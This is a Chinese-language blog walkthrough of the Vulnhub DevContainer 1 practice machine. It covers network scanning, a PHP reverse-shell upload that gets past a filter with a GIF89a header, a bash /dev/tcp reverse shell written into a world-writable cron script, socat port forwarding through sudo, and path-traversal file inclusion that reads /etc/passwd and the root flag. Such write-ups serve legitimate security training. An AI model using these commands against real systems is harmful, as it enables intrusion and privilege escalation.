首页 > 其他分享 >Vulnhub之DevContainer 1靶机解题详细过程

Vulnhub之DevContainer 1靶机解题详细过程

时间:2022-11-17 21:57:01浏览次数:45  
标签:sbin 56.184 .. nologin 192.168 Vulnhub 靶机 DevContainer usr

DevContainer 1

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                                                                                                                             
                                                                                                                                                                                                                                 
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:bc:70:2d      2     120  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.184  08:00:27:d6:bd:dd      1      60  PCS Systemtechnik GmbH                                                                                                                                                        


利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.184

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.184 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-17 06:57 EST
Nmap scan report for bogon (192.168.56.184)
Host is up (0.0010s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Freelancer - Start Bootstrap Theme
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D6:BD:DD (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds

NMAP扫描结果表明目标主机仅有1个开放端口:80,运行http服务

Get Access

┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ curl http://192.168.56.184/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.184 Port 80</address>
</body></html>

目标没有robots.txt文件,接下来扫描一下有无目录

──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ gobuster dir -u http://192.168.56.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.184
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/17 07:44:52 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.184/img/]
/mail                 (Status: 301) [Size: 315] [--> http://192.168.56.184/mail/]
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.184/upload/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.184/css/]
/license              (Status: 200) [Size: 11336]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.184/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.184/fonts/]
/less                 (Status: 301) [Size: 315] [--> http://192.168.56.184/less/]
/server-status        (Status: 403) [Size: 279]
Progress: 219937 / 220561 (99.72%)===============================================================
2022/11/17 07:45:41 Finished
===============================================================

这里的Upload尤其需要引起注意:

那接下来就看如何上传php脚本了。

当直接上传shell.php时,返回以下错误:

WARNING: Failed to daemonise. This is quite common and not fatal.
Warning: fsockopen(): unable to connect to 127.0.0.1:1234 (Connection refused) in /var/www/html/upload/files/shell.php on line 100
Connection refused (111)

尝试在shell.php脚本头部加上GIF89a;

发现可以成功上传,那么上传在什么地方呢,跟就按前面出错的信息,应该upload/files/shell2.php

└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.184] 49096
Linux 302a91df22f1 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 13:08:28 up  1:18,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python 
$ which python3
$ bash -i
www-data@302a91df22f1:/$ 

成功拿到了shell,但是似乎是在容器里,没有python解释器

www-data@302a91df22f1:/var/www/html/Maintenance-Web-Docker$ ls -alh
ls -alh
total 20K
drwxrwxrwx  2 root 1000 4.0K Nov 17 11:50 .
drwxr-xr-x 11 root root 4.0K Sep 12  2020 ..
-rwxrwxrwx  1 root root  164 Sep 13  2020 list.sh
-rwxr-xr-x  1 root root  204 Sep 12  2020 maintenance.sh
-rw-r--r--  1 1000 1000 3.0K Nov 17 13:19 out.txt

list.sh的权限是777,因此可以修改该脚本,从Out.txt可以看出该脚本每分钟会执行一次,因此通过这个脚本写入反弹的shell

www-data@302a91df22f1:/var/www/html/Maintenance-Web-Docker$ echo 'bash -i >& /dev/tcp/192.168.56.137/6666 0>&1' > list.sh
v/tcp/192.168.56.137/6666 0>&1' > list.sh
www-data@302a91df22f1:/var/www/html/Maintenance-Web-Docker$ cat list.sh
cat list.sh
bash -i >& /dev/tcp/192.168.56.137/6666 0>&1

└─$ sudo nc -nlvp 6666                                         
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.184] 38332
bash: cannot set terminal process group (1918): Inappropriate ioctl for device
bash: no job control in this shell
richard@EC2:~$ id
id
uid=1000(richard) gid=1000(richard) groups=1000(richard),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
richard@EC2:~$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork
        TCP\:127.0.0.1\:90
richard@EC2:~$ 

socat执行,将本地90端口转至8080端口

richard@EC2:~$ sudo -u root /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
<ols/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
2022/11/17 08:30:22 socat[1982] E bind(5, {AF=2 0.0.0.0:8080}, 16): Address in use
richard@EC2:~ 

执行上述命令即可访问8080端口,

┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ curl http://192.168.56.184:8080/index.php
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?view=about-us.html">About Us</a>
            <a href="index.php?view=contact-us.html">Contact</a>
        </div>
 <p><b>Welcome to our main page!</b><br><br>You know we are the best of our kind, and this is why you are here! The 'Super Secure Company' is here for you. We guarantee 100% success to our security audit projects. Among other things, we organise your network, we reassure for the security of your devices and of course, we keep hackers away from your Web Application!</br></p>
    <img src='https://cdn.drawception.com/images/panels/2016/6-6/9wAKWbFZAz-8.png'>    </body>
</html>

仔细观察超链接,index.php可能含有文件包含漏洞

┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ curl http://192.168.56.184:8080/index.php?view=../../../../../../etc/passwd
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?view=about-us.html">About Us</a>
            <a href="index.php?view=contact-us.html">Contact</a>
        </div>
<p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
</p>    </body>
</html>
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ curl http://192.168.56.184:8080/index.php?view=../../../../../../root/root.txt
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?view=about-us.html">About Us</a>
            <a href="index.php?view=contact-us.html">Contact</a>
        </div>
<p></p>    </body>
</html>
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/DevContainer1]
└─$ curl http://192.168.56.184:8080/index.php?view=../../../../../../root/proof.txt
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?view=about-us.html">About Us</a>
            <a href="index.php?view=contact-us.html">Contact</a>
        </div>
<p> _    _      _ _       _                  _ 
| |  | |    | | |     | |                | |
| |  | | ___| | |   __| | ___  _ __   ___| |
| |/\| |/ _ \ | |  / _` |/ _ \| '_ \ / _ \ |
\  /\  /  __/ | | | (_| | (_) | | | |  __/_|
 \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___(_)
                                            
07f61ca07bc617f9639b412423b2cc6f
Twitter: @0x04E1
</p>    </body>
</html>

利用文件包含漏洞即可获取root flag.

对了因为流量最后通过socat代理转发,因此像gobuster等工具无法工作于8080端口这种场景,不过只要注意观察,用人工的方法就可以发现文件包含漏洞。

标签:sbin,56.184,..,nologin,192.168,Vulnhub,靶机,DevContainer,usr
From: https://www.cnblogs.com/jason-huawen/p/16901107.html

相关文章

  • vulnhub靶场DomDom
    0x000靶场描述你对PHP程序的理解程度如何?您对Linux错误配置有多熟悉?此图像将涵盖高级Web攻击、开箱即用的思维和最新的安全漏洞。此靶场没有flag,获取到root权限即......
  • vulnhub靶场CyNix
    0x000靶场描述级别:中级描述:这是一台Boot2Root机器。该机器与VirtualBox兼容,DHCP将自动分配一个IP。您必须查找并读取两个flag(user和root),它们分别存在于user.txt和......
  • vulnhub靶场Os-hackNos-2
    0x000靶场描述难度:简单到中级flag:2个flag第一个用户和第二个根学习:Web应用程序|枚举|密码破解0x001靶场下载https://www.vulnhub.com/entry/hacknos-os-hac......
  • vulnhub靶场Os-hackNos-3
    0x000靶场描述难度:中级flag:2个flag第一个用户和第二个root学习:Web应用程序|枚举|权限提升网站:www.hacknos.com联系我们:@rahul_gehlaut0x001靶场下载https......
  • vulnhub靶场之DEATHNOTE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DEATHNOTE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/deathnote/Deathnote.ova......
  • Vulnhub Crossroads靶机解题详细过程
    Crossroads识别目标主机IP地址......
  • Vulnhub ColddboxEasy 靶机解题详细过程
    Colddbox识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Colddbox]└─$sudonetdiscover-iethCurrentlyscanning:172.16.52.0/16|ScreenView:UniqueHo......
  • DC-2靶机渗透
    DC-2靶机提示:总共5个flag,其中4个为提示flag,根据提示找到下一个flag,第五个为最终的flag,拿到第五个才算通关成功信息收集1,使用nmap扫描网段获取IPnmap-sP网段在使用n......
  • vulnhub靶场之VIKINGS: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/vikings/Vikings.ov......
  • Vulnhub Chili靶机详细解题过程
    Chili识别目标主机IP地址本靶机存在无法从Virtualbox自动获得IP地址的问题,根据本人另文来解决该问题。──(kali㉿kali)-[~/Vulnhub/Chili]└─$sudonetdiscover-i......